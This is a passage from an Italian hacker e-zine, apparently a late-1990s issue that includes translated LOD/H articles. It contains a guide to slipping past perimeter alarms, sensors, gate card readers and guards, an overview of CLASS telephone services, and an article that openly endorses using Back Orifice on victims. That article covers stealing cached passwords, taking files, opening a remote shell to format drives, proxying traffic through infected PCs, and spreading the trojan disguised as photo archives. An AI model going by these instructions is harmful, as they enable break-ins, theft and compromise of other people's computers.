di un intruso ri- levando la diminuzione di energia nel fascio. I fasci possono proteggere un area lunga fino a 1500 piedi e larga 40 piedi. La trasmissione e' simile ad uno sgu- ardo qundi l'area deve essere libera di ostacoli come alberi che possono bloc- care il fascio. I sistemi a microonde sono in grado di operare col brutto tempo e non segnaleranno un'allarme dovuta agli uccelli od a pulviscolo. Questi sistemi lavorano sull'effetto Doppler, in cui rivelano il movimento che cambia l'energia e fa scattare l'allarme. Queste apparecchiature si trovano di solito all'interno di una rete per evitare falsi allarmi. Questi sistemi si pos- sono vedere facilmente. Sono pali alti circa 1-2 yarde, di circa 6 per 6 pollici e ce ne sono due, un ricevitore ed un trasmettitore. In alcuni casi ce ne saran- no di piu' e saranno in grado quindi di proteggere un'area piu' estesa. Per eluderli devi entrare nel campo molto lentamente, facendo un passo alla vo- lta e muovendoti come a rallentatore. Non importa quanto forte colpisci il ter- reno, dal momento che non rivela l'attivita' sismica, solo a che velocita' ti avvicini al campo. Se lo fai molto lentamente potrai essere in grado di evitar- lo. Ricordati che questi tipo di sensori sono piu' sensibili piu' ci si avvici- na. Ergo, scegli un percorso che ti conduca lontano dai pali. Sistemi fotoelettrici: ---------------------- Questi sistemi si basano su una barriera invisibile creata da fasci di luce in- frarossa inviada da una sorgente di luce ad un ricevitore. Quando si interrompe il fascio l'allarme viene fatta scattare. Il fascio puo' avere un raggio d'azio- ne effettivo di 500 piedi. Fasci multipli possono essere usati per aumentare la sicurezza del sistema, rendendo difficile passarvi sopra o sotto. I sistemi fo- toelettrici sono soggetti a falsi allarmi a causa di uccelli od oggetti traspo- rtati dal vento. Si puo' risolvere il problema installando un sistema che ri- chieda che il fascio venga interrotto a lungo per attivare l'allarme. Le condi- zioni meteorologice come la nebbia fitta possono interrompere il fascio e causa- re qundi un'allarme. Anche a questo si puo' riparare installando un sistema che reagisce alla perdita graduale di segnale. Inoltre questi sistemi non devono essere esposti direttamente alla luce del sole che tramonta/sorge perche' anche in questo caso si avra' l'interruzione del fascio. Come puoi notare, questo sistema presenta vari problemi che puoi sfruttare per eluderlo. Come con ogni sistema bisogna sorvegliare il sistema in particolari condizioni climatiche per verificare la presenza dei detti sistemi e per vedere quali tipi di falsi allarmi causano. Molte volte sarai in grado di sfruttare certe situazioni meteorologiche per compiere la tua missione. Se c'e'solo un set di apparecchiature (trasmettitore e ricevitore), cerca di calcolare la distanza di esse dal suolo. Poi potrai decidere se passare sotto il fascio o saltarlo. Anche questo apparecchio si basa sul fatto che l'intruso non conosca come fun- zioni. Varie: ------ Le guardie: Ci sono due tipi di guardie, interne o pagate dalla compagnia e le guardie di contratto. Le guardie di contratto sono meno sicure dal momento che non lavorano per lo stabile e se fanno un errore vengono trasferite da un'altra parte e basta. Le guardie interne conoscono meglio lo stabile ed hanno di piu' da perdere, quindi sono probabilmente piu' conscie circa la sicurezza. Stai at- tento alla ronda lungo il perimetro che le guardie faranno per ispezionarlo vi- sivamente. Monitoraggio centrale: Il monitoraggio dei sistemi menzionati in quest'articolo viene di solito eseguito in una postazione centrale all'interno dello stabile. Di solito le guardie *DOVREBBERO* tenere d'occhio la situazione. Se hai piani- ficato bene, puoi aver scoperto che la guardia lascia la postazione per fare certe cose alla stessa ora tutte le notti. In quest'intervallo di tempo dovresti fare tutto quello che puo' essere visto da telecamere. Sfortunatamente, ci sara' probabilmente piu' di una guardia al posto di controllo rendendo l'impresa quasi impossibile. Cancelli: Probabilmente la via piu' facile da cui entrare e' passare dai cancel- li. In una macchina o camminando. Non sara' facile se e' sorvegliato o c'e' un lettore di pass per entrare. Lettori di pass esterni: Ci sara' una profonda trattazione dei tipi di pass usa- ti per entrare nella terza parte della serie. Ma per ora, se la tessera usata e' magnetica, e' possibile eludere il sistema. Se hai una VISA od altre tessere magnetiche, faccela passare attraverso, muovila, scuotila ecc. ecc. e forse il cancello si aprira'. Il perche' e' semplice: dal momento che si trova all'este- il lettore e' soggetto a condizioni di tempo estreme ogni giorno, quindi le te- stine possono non funzionare sempre correttamente, o il circuito non lavorare come dovrebbe, facendo 'errori' che ti permetteranno di entrare. Combinazioni: Le apparecchiature elencate in questo articolo non devono per forza essere usate da sole. Possono e sono usate insieme con altri mezzi per rafforzare la sicurezza. Diversivi: In alcuni casi, un diversivo puo' assicurarti un passaggio sicuro attraverso il perimetro. Ricordatelo. Condizioni meteorologiche estreme: Tutte le apparecchiature hanno una fascia di temperature in cui possono operare. Nella parte bassa della scala, la mag- gior parte dei sistemi non operano sotto i -30 F›. Inoltre presentano un'atti- tudine a non funzionare correttamente anche a -13 F, -4 F, +10 F, +32 F. Nella parte alta della scala non opereranno sopra: +120 F, +130 F e +150 F. E' poco probabile che la temperatura esterna salga sopra i +120 F, ma in parecchi posti, puo' gelare. Prendi queste possibilita' in considerazione se uno stabile presen- ta questi sistemi e non riesci ad eluderli in altri modi. Sicuramente non avro' menzionato tutto cio' che viene usato per la protezione del perimetro in questo articolo. Ho cercato di informarti sui mezzi piu' comu- nemente usati. Alcune cose sono state escluse intenzionalmente, altre no. Ac- cetto tutte le correzioni, i suggerimenti e i metodi per quest'articolo ed i futuri gia' in programma. Potete contattarmi tramite lo 'Staff Account' LOD/H. CONCLUSIONE: ------------ Quest'articolo e' incentrato primariamente sull'identificazione degli 'attrez- zi' usati nel campo della sicurezza fisica per la deterrenza, prevenzione, ri- levamento e reazione nei confronti di un intruso. Ci sono anche altri metodi che sono stati usatti per eludere questi 'attrezzi'. Nessuno dei metodi menzionati funziona al 100% in tutte le circostanze, ma TUTTI hanno funzionato, alcuni in circostanze controllate, altri no. Ma hanno tutti funzionato. Alcuni metodi pos- sono sembrare ortodossi, ma fanno il loro lavoro. Alcuni metodi non sono stati intezionalmente menzionati per ovvie ragioni. Sebbene quest'articolo sembri una sorta di guida, in nessun modo ti sto dicendo ti infrangere le leggi. Ti sto solamente mostrando come riconoscere apparecchi di cui non sapevi l'esistenza ed evitarti quindi di essere catturato. Il sistema non gioca sempre pulito, allora perche' noi dovremmo ? RICONOSCIMENTI: --------------- Gary Seven (LOH) NightWolf (UC) >> ha collaborato con NightWolf nella traduzione Li-Nux , con altri txt sempre<< >> made in LoD !!!!!<< NightWolf ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ þ [Indice LOD/H Numero 1] UnDeR CoNsTrUcTiOn ³ ³ [MiSc SeCtIoN] Articolo di: NightWolf ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ LOD/H TECHNICAL JOURNAL ----------------------- INTRODUZIONE: Benvenuto al primo numero del TJ LOD/H! Il TJ LOD/H e' un giornale software gratuito il cui primo obiettivo e' quello di aumentare le conoscenze di quelli che sono interessati in argomenti del tipo: Telecomunicazioni, Datacomunicazioni, Computer & Sicurezza/Insicu- rezza Fisica ed i vari aspetti tecnici del sistema telefonico. Gli articoli contenuti qui dentro, sono esclusivamente originali a meno che non sia specificato diversamente. Tutte le sorgenti di informazione di un articolo sono elencate nell'introduzione o nella conclusione dello stesso. Non accetteremo articoli non originali, modificati, o contenenti in- formazioni invalide o false. Accetteremo articoli da tutti quelli che rispet- teranno i precedenti criteri, dal momento che i membri della LOD/H ed un ristretto gruppo di altri saranno i primi che contribuiranno, ma chiunque puo' mandare articoli. Incoraggiamo i lettori a scaricare tutti i files di ogni numero, non solo quelli che interessano loro. Ci sono due motivi per questo: il giornale e' ritenuto uno sforzo collettivo, quindi i files contenutivi non sono pensati per essere distribuiti individualmente, secondariamente, mantenere il numero intatto ti permettera' di distribuirlo al altre BBS ed amici a cui interessa. Non c'e' data precisa per il rilascio dei numeri, dal momento che non abbiamo obblighi monetari o legali nei confronti dei lettori, prevediamo che i numeri seguenti saranno rilasciati in 2 o 3 mesi da quello precedente. Quindi aspettati dai 4 ai 6 numeri l'anno sempre che continuiamo a produrli, come comunque abbiamo intenzione di fare. Gli sponsors del giornale riceveranno il giornale direttamente dallo staff appena verra' rilasciato ed inoltre e' stata aggiunto uno 'staff account' alla lista degli utenti per fari si' che i lettori possano risponderci diret- tamente circa il contenuto del giornale. Se anche tu vuoi entrare a far parte degli sponsors, mandaci una mail su uno qualunque degli sponsors seguenti: Atlantis Metal Shop Private Private Sector Digital Logic Hell Phrozen Over Lo 'staff account' del LOD/H TJ e' su tutte le BBS dei nostri sponsors. Questo permette ai lettori di contattarci per le ragioni seguenti: * Se si hanno domande circa gli articoli, o la validita' del materiale, si e' liberi di contattarci tramite lo 'staff account' e lasciare all'autore un modo per contattarvi. Questo assicura una migliore comprensione dei lettori dell'argomento ed inoltre assicura l'integrita' dell'autore come conoscenza ed originalita' nell argomento trattato. * Si possono lasciare domande per lo staff a cui verra' risposto nella sezio- ne 'Ask The Staff' del giornale. Le domande riportate saranno di interesse generale o altro. Cercheremo di rispondere via E-Mail a tutte le domande a cui non verra' data risposta nel giornale. Non sappiamo ogni cosa, ma tutto quello che sappiamo lo condivideremo con chi chiede. Varie caratteristiche del giornale includono: Editoriali: Brevi articoli che riguardano il mondo delle telecomunicazioni in generale. Appunti & Notizie di Rete: Articoli ed altre cose associati agli argomenti trattati nel giornale. Posta dei Lettori: Domande e commenti sui numeri precedenti dai lettori che ci contattano tramite lo staff account sugli sponsors. Speciali: Non saranno presenti tutte le volte e potranno essere qualsiasi cosa che non rientri nel formato generale del giornale. ------------------------------------------------------------------------------- INDICE: 01 Introduzione al LOD/H Technical Journal Staff 05 K Indice del Volume 1, Numero 1 02 Custom Local Area Signalling Services (CLASS) The Videosmith 17 K 03 Identificare ed evitare la sicurezza fisica ed i Lex Luthor 23 K Sistemi Rilevamento Intrusione Parte I: Il Perimetro 04 Il Traffic Service Position System (TSPS) The Marauder 23 K 05 Introduzione all Hacking del TOPS-20s Blue Archer 19 K della DEC 06 Costruisci la tua Blue Box (Include Schema) Jester Sluggo 16 K 07 Intelligenza e Processi di Interrogazione Master Of Impact 18 K 08 L'Impianto Esterno di Distribuzione di Ciclo: Parte A Phucked Agent 04 25 K 08 L'Impianto Esterno di Distribuzione di Ciclo: Parte B Phucked Agent 04 23 K 10 LOH Telenet Directory: Aggiorn. #4 (1-1-87) Parte A LOH 25 K 11 LOH Telenet Directory: Aggiorn. #4 (1-1-87) Parte B LOH 18 K 12 Notizie & Note di Rete Staff 10 K Totale: 12 files 223 K ------------------------------------------------------------------------------- Cosi' finisce l'introduzione, speriamo che ti piaccia ed aspettiamo che ci contatti. -> Tradotto Da NightWolf [Under Construction] -> Sezione Italiana LOD/H ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ þ [Custom Local Area Signalling Services] UnDeR CoNsTrUcTiOn ³ ³ [PhReAkInG SeCtIoN] :) Articolo di: NightWolf ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ Scritto da: The Videosmith Versione - 1.1 ----------------------------(c) Copyright 1994--------------------------- Questo articolo spieghera' il nuovo sistema LASS (AT&T Bell Labs) sviluppato, e come ci riguardera' da vicino in un futuro prossimo. Nota che il servizio per gli utenti e' chiamato "CLASS", la 'C' sta per 'Custom'. LASS ---- Il telefono era destinato a diventare un ben usato e potente strumento per compiti altrimenti laboriosi. I contatori del gas ed altri servizi a conta- tori saranno controllati recuperando i dati automaticamente tramite comuni- cazione telefonica. Alcuni hanno grandi progetti per gli usi che si possono fare del sistema telefonico, e il CLASS e' un progetto che fara' da bomba innovativa sul mondo delle telecomunicazioni. Attualmente, i Bell Laboratories stanno sviluppando una componente locale della rete CCIS. Questa componente cambiera' il modo in cui la gente usera' il telefono e l'atteggiamento con cui lo faranno. Dara' molto piu'controllo del telefono all utente, come mai in precedenza. Questa componente si chiama CLASS (Custom Local Area Signalling Services). Ognuno trovera' qualcosa di utile in questa nuova componente telefonica sviluppata. Le pizzerie non dovranno piu' preoccuparsi dei commercianti di cibo Italiani fraudolenti, e le vecchiette non si dovranno preoccupare degli scherzi telefonici da certi individui dubbi. Quali sono tutte queste fantastiche componenti? Queste includeranno la richiamata dell'ultimo numero chiamante, che lo si conosca o no. Un'altra caratteristica saranno toni di attesa di chiamata distinti ed inoltro chiamata preselezionato (sarai chiamato solo dalle persone con cui vuoi parlare). Questa e' solo una lista rudimentale di caratteristiche del CLASS che saranno implementate. E' un sistema molto potente che si basa sul LCCIS (Local Common Channel Interoffice Signalling), una versione intra-LATA del ben conosciuto CCIS. Precedenti del CCIS ------------------- Il CCIS e' stato originalmente introdotto nel 1976 come, basilarmente, il sistema di segnalazione per terminare tutti i sistemi di segnalazione. Invece di usare i trunks vocali per trasportare l'informazione di segnalazione, venne usata una rete di dati. Quella rete comprende collegamenti dati da ogni TO [riguarda il CCIS] all'appropriato STP (punto di trasferimento della segnalazione). L'informazione di segnalazione viaggia a 4800 bauds in questi collegamenti fino agli STPs (Nota che i bauds aumenteranno in base alla disponibilita' economica dell'hardware di comunicazione piu' veloce), dove il programma di controllo memorizzato instrada l'informazione della segnalazione agli uffici necessari al fine di aprire e completare il percorso della chiamata. SPC controlla automaticamente lo stato del telefono agganciato/non-agganciato prima di aprire il percorso, e se lo stato risulta non-agganciato (in questo caso l'utente non ha il servizio di attesa di chiamata), ritorna informazioni al CO originante di attivare un segnale di occupato all utente. Questa e' uno dei tanti servizi che il CCIS offre alla rete. Siccome questo testo non e' incentrato sull'argomento del CCIS della ta- riffa, gli aspetti tecnici non cosi' importanti (eccetto per il confronto fra reti locali e di tariffa a fine descrittivo): e' pero' importante accorgersi quando automatizzato e flessibile questo tipo di metodo di segnalazione risulti, come la sua velocita' ed efficienza. Tutto il controllo software che ha a che fare con la rete locale o di tariffa e' chiamato "stored program control network" o ISDN (Integrated Services Digital Network). Parleremo del LCCIS in un articolo futuro. Caratteristiche del CLASS/LCCIS ------------------------------- L'LCCIS appare circa cosi: /--\ CO-2 ESS# /----I-T-G-----1A-----I-T-G----\ | \--/ | | | | | LCCIS | | | | | ---------- | /--\--LCCIS--|CCIS/SPC|--LCCIS--/--\ CO-1 ---------- CO-3 ESS# ESS# -1A----interoffice trunk group---1A- \--/ \--/ SPC = Stored Program Control (Controllo di rete e Punto di Trasferimento del Segnale) ITG = Gruppo trunk 'interoffice' (comunicazione tra uffici) L'uso di connessioni dati ad alta velocita' fra gli uffici locali crea una via di comunicazione piu' flessibile e piu' efficiente per gli uffici centrali intra-LATA. Invece di usare la segnalazione per-trunk (ovvero usare lo stesso trunk usato per la trasmissione vocale per segnalare le informazioni di instradamento e di applicazione tariffa), i dati verranno inviati tramite una connessione dati dedicata a 2400 bps, che interagisce con un punto di trasferimento ed elaborazione del segnale locale. Da quel punto, l'informazione della segnalazione viene instradata alle appropriate centrale od ai selettori in sequenza. Quando ricercavo dati per questo articolo, stavano sviluppando il CLASS solo per il selettore #1A ESS data la flessibilita' del suo sistema di ge- stione della memoria, la sua velocita' e cio' che i Bell Labs chiamavano 'efficienza di costo'. Alla fine della ricerca riguardante questo articolo, il CLASS era gia' stato implementato nello stadio dati sull' ESS#5. LCCIS interagira' con i selettori locali usando l'SPC, tenendo traccia dei dati delle chiamate. I selettori 1A faranno uso di cio' che e' chiamato memoria di "scratch pad" (conosciuta anche come memoria di chiamata), unita al database dell'LCCIS, per fornire tutti i servizi che il LASS fornisce. Questa memoria conterra' dati come la "line history" ed una "screening list". Queste informazioni renderanno possibili la ricomposizione dell'ultimo numero chiamato, inoltro chiamate selettivo, rifiuto chiamata, e distinti toni di attesa di chiamata. CF Selettivo (Call Forwarding ---> Trasferimento di Chiamata) ------------------------------------------------------------- L'inoltro delle chiamate selettivo viene stabilito dall'iscritto al servi- zio (l'utente deve avere un inoltro chiamate convenzionale per richiedere questo servizio). Usando la memoria di chiamata o piu' specificamente la "screening list", uno sara' in grado di di inoltrare selettivamente una chia- mata ad un altro numero eseguendo pochi semplici comandi sul telefono fisso di casa (a differenza dei telefoni che variano nelle stanze degli alberghi). Un codice di accesso (c'e' una lista a fine file) andra' inserito ed il CO del chiamante emettera' un tono speciale. Il cliente comporra' poi i numeri che vuole inoltrare al particolare numero. Dopo ogni numero, si udira' un tono che indichera' il corretto inserimento del numero. Ogni BOC (Bell Operating Company) definira' il numero massimo di numeri che verranno trac- ciati. Una volta fatto cio', il cliente riaggancia e l'ESS riprende il con- trollo. Ora, quando qualcuno chiami questo particolare utente, il selettore dell'utente confrontera' il numero del chiamante con quelli memorizzati nella memoria di 'scratch pad'.Se il CLID (Caller ID) corrisponde ad uno dei numeri nella memoria 1A associata al numero chiamato, la chiamata verra' trasferita. Se questo non accadra', il telefono suonera' alla sua postazione originale. In particolare questo puo' rendere la vita difficile agli hackers del sistema, come probabilmente immagini. Una compagnia puo' iscriversi a questo servizio CLASS, ed inserire solo i numeri degli utenti autorizzati ad essere trasferiti ad un terminale. Inoltre, usando questo servizio, sara' possibile, da parte delle compagnie telefoniche, registrare le telefonate a numeri particolari. Questo tipo di sicurezza e' difficile da eludere, ma naturalmente c'e' un modo (semplice legge di natura: nulla e' perfetto). Ci sara' sempre il modo ovvio di trovare i numeri a cui vengono trasferiti, come comporre automatica- mente interi scambi (uno dopo l'altro). Sfortunatamente, CLASS fornira' altri servizi che renderanno lo 'scanning' un attivita' meno frequente. Suoneria Differenziata ---------------------- La suoneria differenziata e' gestita e' gestita allo stesso modo dello inoltro di chiamata selettivo: l'elenco dei numeri nella memoria di 'scratch pad'. Il cliente puo' inserire numeri a cui l'ESS dara' una speciale prece- denza e, quando una chiamata giunge a questo particolare numero del cliente, l'ESS controlla se il CLID corrisponde ad uno dei numeri nell'elenco della 'scratch'. Se corrisponde, il CO del cliente invia all'apparecchio agganciato uno speciale tono di chiamata in arrivo, oppure invia all'apparecchio non ag- ganciato uno squillo alternativo (probabilmente usando voltaggio di 'ring' temporizzato in modo anormale... alcuni lettori possono pensare all'esempio dello squillo della British Telecom, sebbene molti squilli stranieri tendano a differenziarsi gli uni dagli altri). Rifiuto di Chiamata ------------------- Il rifiuto di chiamata, un servizio che rende possibile impedire a certi idioti di far squillare il tuo telefono (un servizio di cui tutti possiamo beneficiare in certi momenti... oppure sempre), si serve delle informazioni recuperate dal LCCIS (CLID). Mettiamo che l'utente A chiami l'utente B: ----LCCIS---- A ---> CO< >CO ---> B ----trunk---- L'utente B desidera rifiutare la chiamata dell'utente A, e compone un codice speciale *##. L'ESS riprende il controllo di nuovo, recupera il CLID di A e memorizza il tutto in una speciale lista associata all'utente B. La volta successiva che il cliente A cerchera' di chiamare B, l'ufficio di ter- minazione reinstradera' la chiamata in un locale (il CO originante) registra- tore digitale il quale dira' all'utente A che la chiamata fatta non puo' es- sere completata data l'esplicita richiesta di B ("Spiacente, l'utente da lei chiamato desidera che lei venga divorato da un cannibale rabbioso..."). Richiamata (Dial Back) ---------------------- Per creare un servizio come il "dial back" (per la parte chiamata o chia- mante), la memoria di 'scratch pad' dell'ESS entra in gioco di nuovo. Gli stesi principi vengono impiegati nel gia' presente auto-redial (ricomposizio- ne ultimo numero). Il CLID verra' usato in questo modo: (ricevuto dal CLID) memoria ultimo chiamato memoria ultimo chiamante ---------- ---------- |###-####| |###-####| ---------- ---------- Il tuo selettore ESS terra' traccia di chi hai chiamato per ultimo, e di chi ti ha chiamato per ultimo, attraverso il recupero delle informazioni for- nite dall'LCCIS insieme col tuo selettore (il tuo selettore verra' a conosce- nza dell'ultimo numero da te composto memorizzando direttamente i numeri di- gitati precedentemente. La segnalazione locale fornira' le informazioni della linea chiamante prelevandole dalle informazioni di chiamata del'LCCIS usando il collegamento dati sopra menzionato). In questo modo, con il tuo codice di accesso (*##), avrai il servizio di ricomposizione totalmente a disposizione. Tracciamento dell'Utente ------------------------ Questo tipo di gestione della memoria e di metodo di segnalazione permet- tera' inoltre il servizio, che tutti temono, abolira' il "phreaking". Il tracciamento iniziato dall'utente, usando l'ultimo numero chiamante presente nel tuo CO, sara' disponibile appena i Bell Laboratories ne verranno a cono- scenza. Sembra che ci siano due tipi "tracciamento originato dall'utente". Uno inoltrera' il numero alle autorita' locali dove sara' gestito tramite la polizia. L'altro tipo, a cui la AT&T/Bell Labs sta lavorando e' un display posizionato vicino al telefono che mostrera' il numero chiamante. Tutti gli altri servizi CLASS che fanno uso dell'informazione della linea chiamante vengono usati a discrezione dell'chiamante. Il tracciamento originato dall'u- tente, comunque, usando le informazioni del chiamante a linea singola o 'bulk' sara' permettera' al cliente di vedere il numero del chiamante. Il mondo non sta per finire... pero', in ogni caso. Clienti singoli potranno' usare un 'privacy code' speciale, che quando composto, dice al selettore dall'altra parte di non inoltrare il numero del chiamante ad un display. Se ci sia un modo per evitare cio' e' ovvio: naturalmente. La polizia ed il go- verno sembrano avere una priorita' maggiore di quella della tua privacy. Sem- bra che le portanti a lunga distanza potranno beneficiare del CLASS. Ecco pe- rche' la Bell/AT&T dovrebbe dare tutti i tipi di servizi speciali agli OCCs non dati ad altre compagnie telefoniche, specialmente dopo che l'accesso 'equal' e' stato implementato, non so (ma di nuovo, e' accesso 'EQUAL'). E' comunque possibile che non ci sara' nessun display. Ci sono dei phreakers che sentono che il BOC non dara' mai alla parte ricevente il privilegio di ricavare l'informazione del chiamante direttamente, se non a causa del vecchio comportamento della Bell circa la privacy. Dovremo aspettare e vedere circa quel punto: il display e' attualmente funzionante ed e' in beta-testing. Se i Bell Labs sentono che questo servizio puo' e sara' usato in larga scala a stadio non-beta nelle BOC e' tutta un'altra storia. Note Finali ----------- Il CLASS, usando il CCIS locale, non funzionera' nelle chiamate intra-LATA. La rete CCIS locale e' proprio questo: locale, e non si estende fino alla rete di tariffa. Questo sara' eventualmente corretto (permettendo al CCIS di tariffa di interagire con l'LCCIS quando si tratta di informazione su CLID). Non e' stato determinato [dall'autore dell'articolo] come le varie reti a lunga distanza scambieranno informazioni con la rete locale del BOC. Sembrerebbe un compito difficilissimo quello di cercare di integrare le co- mpagnie emergenti a lunga distanza nell'AT&T/BOC ISDN, a causa delle inconsi- stenze dell equipaggiamento o della mancanza di cooperazione da parte della OCC ecc. ecc. Si parlera' di questo in un successivo articolo che trattera' della rete di tariffa CCIS. Sebbene il CLASS ruoti attorno al selettore ESS #1A, e' stato, come menzionato, co-sviluppato per l'utilizzo con la macchina di selezione ESS 5. Il CLASS causera' problemi, come creera' un nuovo ambiente per gli utenti telefonici. Naturalmente, quei problemi sono veri problemi solo per le per- sone che in generale stanno leggendo questo articolo, ma piu' si conosce circa il CLASS piu' comodi ci si sentira' grazie al servizio. Puo' essere usato a proprio vantaggio, persino come hobbysta delle telecomunicazioni. Proprio come una corporazione sara' in grado di costruire una storia completa di chi chiama il loro sistema, ed eventualmente tenere la gente fuori dal loro sistema con la 'blacklist', lo stesso si puo' applicare alle BBSs e simili. Immagina di poter essere in grado di tenere alla larga dalla tua BBS tutti i malviventi locali, o di essere in grado rifiutare tutto il traf- fico eccetto quello degli utenti registrati (rendendo il tuo sistema comple- tamente inaccessibile dalla rete PSTN da qualsiasi telefono eccetto quelli dei tuoi utenti registrati). Sembra essere un servizio utile, almeno e' fa- cile da implementare. E' un po' difficile, se non proprio inopportuno, scrivere un articolo su di un soggetto sempre in cambiamento secondo l'ignoranza del ricercatore. Penso che il CLASS sia un evento di grande momento che almeno sara' rilascia- to qualche testo da qualche hobbysta per la conoscenza pubblica. So' percio' che alcune parti di questo testo saranno 'scadute', od inaccurate, quando il CLASS verra' rilasciato come servizio BOC, cio' spiega dunque perche' c'e' un numero di versione nella testata di quest'articolo. Probabilmente, quando il CLASS diventera' pubblico, la seconda versione sara' rilasciata con le note di aggiornamento (se deve essere, sia... probabilmente cosi'). Spero ti sia servito, The Videosmith. LOD/LOH! ------------------------------------------ Standard allo stadio di test per alcuni servizi: DTMF ! Pulse ! Descrizione del Servizio ------------------------------------------ *66 ! 1166 ! Riconnetti Ultimo Chiamante ------------------------------------------ *63 ! 1163 ! Inoltro Chiamate Selettivo ------------------------------------------ *60 ! 1160 ! Rifiuto di Chiamata ------------------------------------------ *57 ! 1157 ! "Customer Trace" ------------------------------------------ Nota: Questi codici di comando possono variare da BOC a BOC. I codici sopra elencati sono stati estratti da una descrizione generale del CLASS e non specificavano particolari implementazioni dei detti servizi. Riconoscimenti: * Mark Tabas per i suoi punti di vista su alcune parti dell'articolo... per esempio, tracciamento dell'utente ("FUCK NO"). * Doctor <413> Who * Mr. DNA -> Tradotto Da NightWolf [Under Construction] >> mitici traduttori .... ma parlando di storia contemporanea ..... << ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ þ [Applicazioni malsane del Back Orifice] UnDeR CoNsTrUcTiOn ³ ³ [HaCkInG SeCtIoN] Articolo di: TrUsA ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ By TrUsA (9/9/98) Tutti ormai hanno sentito parlare del famoso Back Orifice, che a detta di RAIDUE "consente ad ognuno di diventare Hacker" , ebbene questo tool e' piu' potente di quanto si possa pensare non solo per il fatto di "poter entrare nel tuo computer" (frase che assilla tutti i Lamer del mondo) ma per nuove applicazione che ho avuto il piacere di sperimentare. Premetto intanto che l'installazione del bo a puro scopo distruttivo oltre che eticamente sbagliato (a meno che non si tratti di uno stronzo neanche degno di questo nome) e anche dannoso in quanto se qualcuno si vede cancellare dir o comparire messaggi di sistema con scritto "sei in mio potere" si preoccupa immediatamente di installare un antidoto e addio back. E' molto piu' utile secondo me mantenere l'accesso su quel computer il piu' a lungo possibile per svariati motivi...... Con un semplice comando si possono ricavare tutte le password presenti nella cache di windows e questo puo' far guadagnare simpatici account senza grossi sforzi. Ma gli usi piu' perfidi e malefici sono ben altri. Sarebbe interessante poter prelevare dei file personali o vedere immagini presenti nell'hd del malcapitato, ma le funzioni di trasferimento comprese nel Bo sono complesse e non immediate. Sarebbe molto piu' comodo poter sfogliare l'hd con il nostro amato browser. Questo e' possibile usando la funzione HTTP ENABLE, settando la porta 80 e come root directory ad esempio c: poi collegarsi con il browser all'IP della vittima, per ottenere cosi' la possibilita' di downloadare o uploadare file con un doppio click. Se proprio qualcuno ci sta sul culo sarebbe simpatico formattargli c: anche se ribadisco il concetto che cio' puo' essere dannoso piu' per noi visto che piu' macchine infette ci sono in rete meglio e' per scopi ben piu' nobili che il vandalismo. Per fare cio' bisogna comandare un Prompt di Dos sul computer ospite, questo si ottiene con la funzione APPADD mettendo c:\command.com come EXE_location e 23 come porta e collegandosi poi in telnet all'IP della vittima con la porta 23. Otterremo cosi' la possibilita' di usare comandi come deltree o format o di lanciare piccoli programmi dos e averne il controllo via telnet. Ma veniamo all'aspetto che secondo me e' il piu' valido e utile a coloro che vogliono mantenere l'anonimato per scopi piu' o meno legittimi. E' molto antipatico che qualunque server visitato, sia ftp o telnet, registri su dei log il nostro IP e allora perche' non usare l'IP di un altro per i porci comodi nostri ? Questo oggi e' possibile grazie alla funzione REDIRADD configurando come In Port una porta non occupata del sistema infettato (ad es. 666) e come Out Port l'IP del server in cui vogliamo entrare settando come porta 21,23 a seconda che sia rispettivamente ftp o telnet. E' possibile usare questa applicazione anche per i server irc settando la porta 6667 o 6668 ottenendo cosi' sessioni di chat perfettamente anonime. L'unica limitazione e' che siamo vincolati dalla presenza del IP infetto sulla rete e proprio per questo motivo e' meglio che i PC colpiti da Bo siano molti. Per questo ogni occasione e' valida per dare in giro il boserve attaccandolo a qualche exe da dare a dei Lamer o spacciandolo per zip autoscompattante di foto porno di mia sorella :)))) Questo e' tutto, vado a dare il boserve in giro....Byez TrUsA (un untore del 2000) ;) "It's always the same, running toward nothing, again and again and again" By R.Smith 1980 (Non c'entra un cazzo pero' mi piaceva) ;) (eheheh ne sono convinto) ;) By Li-Nux >> Trusa , master nonke' kollaudatore pazzo !!!!! << >> Ecco qui il nostro Chat, con un bel metodo malsano... << [LEGGETE GENTE... LEGGETE :)] (questo lo ha detto prima madsem :) ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ þ [NonSoloPhreakin'] UnDeR CoNsTrUcTiOn ³ ³ [PhReAk SeCtIoN] Articolo di: ChatR0bot ³ 